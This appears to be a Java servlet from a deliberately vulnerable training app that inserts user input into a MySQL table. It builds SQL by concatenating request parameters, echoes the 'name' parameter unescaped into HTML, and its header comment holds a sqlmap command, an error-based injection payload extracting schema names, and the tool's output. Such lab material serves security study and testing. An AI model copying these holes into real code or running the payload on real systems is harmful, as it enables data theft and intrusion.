package coreservlets;

import java.io.IOException;
import java.io.PrintWriter;
import java.util.Date;
import java.util.Properties;

import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import com.haha.dao.util.DBUtil;

/**
	cmd:
	sqlmap -u "http://192.168.1.123:8080/shw/sqli2?name=xxx&desc=yyy" --dbms mysql -p desc  --dbs
	payload: 
	yyy' AND (SELECT 1869 FROM(SELECT COUNT(*),CONCAT(0x71776b6871,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x7175667971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gMsr'='gMsr
	[18:26:14] [INFO] retrieved: paper
	
	sql:
	insert into blog_user(username,user_desc,first_name)
values(1,'yyy' AND (SELECT 1869 FROM(SELECT COUNT(*),CONCAT(0x71776b6871,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x7175667971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gMsr'='gMsr',xxxxxxxx);
 */

public class SqlIServlet2 extends HttpServlet {
	public void doGet(HttpServletRequest request, HttpServletResponse response)
			throws ServletException, IOException {
		
		Properties p = new PropertiesLoader("classpath:/database.properties").getProperties();
		
		DBUtil.init(p.getProperty("jdbc.url"),
				p.getProperty("jdbc.user"), 
				p.getProperty("jdbc.password")
		);
		
		String sql = 
		"insert into blog_user"
	+ "(username,user_desc,created_on,first_name,last_name,password) "
	  +"values('"
	    + request.getParameter("name") + "','"
		+ request.getParameter("desc")+"','"
	    +new java.sql.Date(new Date().getTime())
		+"','firstname','last name','passwd')" ;
		
		        PrintWriter out = response.getWriter();
	            try {
					DBUtil.executeUpdate(sql);
					response.setContentType("text/html");
					
					out.println("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 "
							+ "Transitional//EN\">" + "\n" + "<HTML>\n" + "<HEAD>"
							+ "<TITLE>" + "Test Servlet 1" + "</TITLE>" + "</HEAD>\n"
							+ "<BODY BGCOLOR=\"#FDF5E6\">\n" + "<H2>"
							+ "Insert Name is:<b>" + request.getParameter("name")  + "</b></H2>\n" + "</BODY>"
							+ "</HTML>");
				} catch (Exception e) {
					e.printStackTrace();
					out.println(e.getMessage());
				}
				
	}

	public void doPost(HttpServletRequest request, HttpServletResponse response)
			throws ServletException, IOException {
		doGet(request, response);
	}
}